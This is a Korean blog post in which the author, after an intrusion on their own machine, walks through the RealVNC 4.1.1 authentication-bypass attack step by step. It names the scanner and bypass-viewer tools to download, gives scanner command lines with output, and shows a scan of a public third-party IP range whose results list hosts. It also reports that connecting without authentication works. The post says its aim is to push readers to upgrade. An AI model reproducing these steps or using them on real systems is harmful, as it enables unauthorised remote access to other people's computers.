어저께 "방금 있었던 황당한 일! RealVnc 해킹 프로그램 존재하나요?" 로 포스팅 한적이 있었습니다.
바로 RealVnc의 무단접속을 눈으로 확인했었더랬죠
몇분의 댓글을 통한 충고대로 버전업을 하긴 했지만 왠지 불안했고 도대체 어떻게 접속을 했는지 방법을 알아야 지금 상태가 안전한건지 알수 있다는 판단하에 해킹방법을 이래 저래 뒤지고 있었습니다.

Vnc에 관련된 사항을 검색하다보니 알고보니 몇일전에 이와관련된 기사가 이미 났었더군요.
Vnc의 사용자가 적어서인지 이슈화는 되지 못해서인지 제가 접하지는 못했던 기사더군요.



벌써 여러건의 공격이 탐지되었고 실제로 접속이 또한 이루어지고 있음을 알 수 있었습니다.
다행인지 몇몇건의 블러그를 뒤지면서 문제의 해킹 프로그램이 있는곳을 알수 있었습니다.
바로 문제의 사이트는 www.securigo.com 사이트로 Vnc의 인증을 우회하여 접속하는 방법뿐 아니라 취약이 있는 버전의 REALVNC가 설치되어 있는지를 검색하는 방법에 대해서도 비교적 쉽고 상세히 설명이 되어 있는듯 합니다.



약간의 설명을 드리자면

1. Window XP SP2 사용자는 TCP/IP패치를 위해 TCPIP-fix.exe 파일을 설치한후 재부팅을 합니다.
    (저는 Window 2000 professional 사용자인데 설치하지 않았습니다.)

  TCPIP-fix.exe 프로그램 다운로드 : TCPIP-fix.exe

2. REALVNC를 사용중인 PC를 검색하기 위한 VNC_bypauth.exe 파일을 다운받습니다.

  VNC_bypauth.exe 프로그램 다운로드 : VNC_bypauth.exe

3. 도스(CMD) 상태에서 도스명령어로 프로그램을 실행시켜서 취약한 REALVNC의 사용중인 PC를 네트워크상에서 검색합니다.
    명령어 예제 : VNC_bypauth.exe -i 192.168.0.1-192.168.0.255 -p 5900 -vnc -v -T 1000
    위의 명령어를 도스상태에서 입력하면

C:\>VNC_bypauth.exe -i 192.168.0.1-192.168.0.255 -p 5900 -vnc -v -T 1000

================================================[rev-0.0.1]==
========RealVNC <= 4.1.1 Bypass Authentication Scanner=======
============multi-threaded for Linux and Windows=============
====================================================[win32]==

FOUND PORT IP STATUS THREADS TOTAL/REMAINING
192.168.0.123 :5900 vnc4:VULNERABLE
F:1 P:255 I:255 S:100% TH:0 0:00:05

C:\>vnc_bypauth.exe -i 51.237.172.1-51.237.172.255 -p 5900 -vnc -v -T 1000

================================================[rev-0.0.1]==
========RealVNC <= 4.1.1 Bypass Authentication Scanner=======
============multi-threaded for Linux and Windows=============
====================================================[win32]==

FOUND PORT IP STATUS THREADS TOTAL/REMAINING
0 255 255 100% 0 0:00:05

C:\>

    위와 같이 자신이 검색하고 싶은 아이피 대역을 입력하고 검색하면 VULNERABLE라는 메세지와 함께 취약한 REALVNC의 설치 PC의 아이피를 알려준다.
    아이피 검색후 VNC_bypauth.exe 프로그램의이 들어있는 디렉토리 위치에 VNC_bypauth.txt라는 텍스트 로그 파일이 생성되는데 그 파일을 열어보면

----------------------------------------------------------------------------
COMMAND: VNC_bypauth.exe -i 192.168.0.1-192.168.0.255 -p 5900 -vnc -v -T 1000
----------------------------------------------------------------------------
192.168.0.123 :5900 vnc4:VULNERABLE
----------------------------------------------------------------------------
Scan complete
--------------------------------------------[heapoverflow.com 2004-2005]----


----------------------------------------------------------------------------
COMMAND: vnc_bypauth.exe -i 51.237.172.1-51.237.172.255 -p 5900 -vnc -v -T 1000
----------------------------------------------------------------------------
51.237.172.53 :5900 vnc4:banned
51.237.172.114 :5900 vnc4:banned
----------------------------------------------------------------------------
Scan complete
--------------------------------------------[heapoverflow.com 2004-2005]----

    위와같이 취약한 REALVNC가 설치된 PC의 아이피 외에도 취약하지 않은 REALVNC가 설치된 PC의 아이피도 함께 알려준다.

4. 05162006-BL4CK-vncviewer-authbypass.exe프로그램을 다운받아서 실행후 접속하고자 하는 취약 REALVNC가 설치된 PC의 아이피를 입력후 접속을 시도하면 인증과정없이 접속되는것을 확인할수 있다.

  05162006-BL4CK-vncviewer-authbypass.exe 프로그램 다운로드 : 05162006-BL4CK-vncviewer-authbypass.exe

실제로 해보니 정말 인증과정없이 쉽게 접속이 되더군요.
이번에 제 피시의 경우 REALVNC 4.1.2로 재설치 했기때문인지 다행히 이 프로그램으로 테스트 결과 접속이 안되더군요.
직접 눈으로 확인해보니 이제는 어제와 같은 황당한 경우는 없겠지 하면서 한숨이 놓이더군요.
아직도 REALVNC 4.1.2를 사용하지 않는분은 빨리 업그레이드버전을 설치하셔서 저처럼 황당한 경우를 겪는일이 없기를 바랍니다.

아참 JK Choi님이 알려주신 링크에 해킹가능여부를 확인할수 있는 VNCFlawTest.exe라는 TEST프로그램도 있더군요
이 프로그램은 다운받아서 실행후 접속하려는 REALVNC가 설치된 PC의 아이피를 입력하면 취약한지의 여부와 함께 취약하다면 현재 그 피시의 화면을 캡쳐해서 보여준다.

VNCFlawTest.exe 프로그램 다운로드 : VNCFlawTest.exe

끝으로 제가 굳이 이렇게 해킹이 가능한 프로그램과 방법을 포스팅하는것은 악용을 하라는것이 아니라
이런 방법으로 문제가 되고 있으니 그 심각성을 깨닫고 빨리 패치하시라는 의미입니다.

크리에이티브 커먼즈 라이선스

이 저작물은 크리에이티브 커먼즈 코리아 저작자표시-비영리-동일조건변경허락 2.0 대한민국 라이선스에 따라 이용하실 수 있습니다.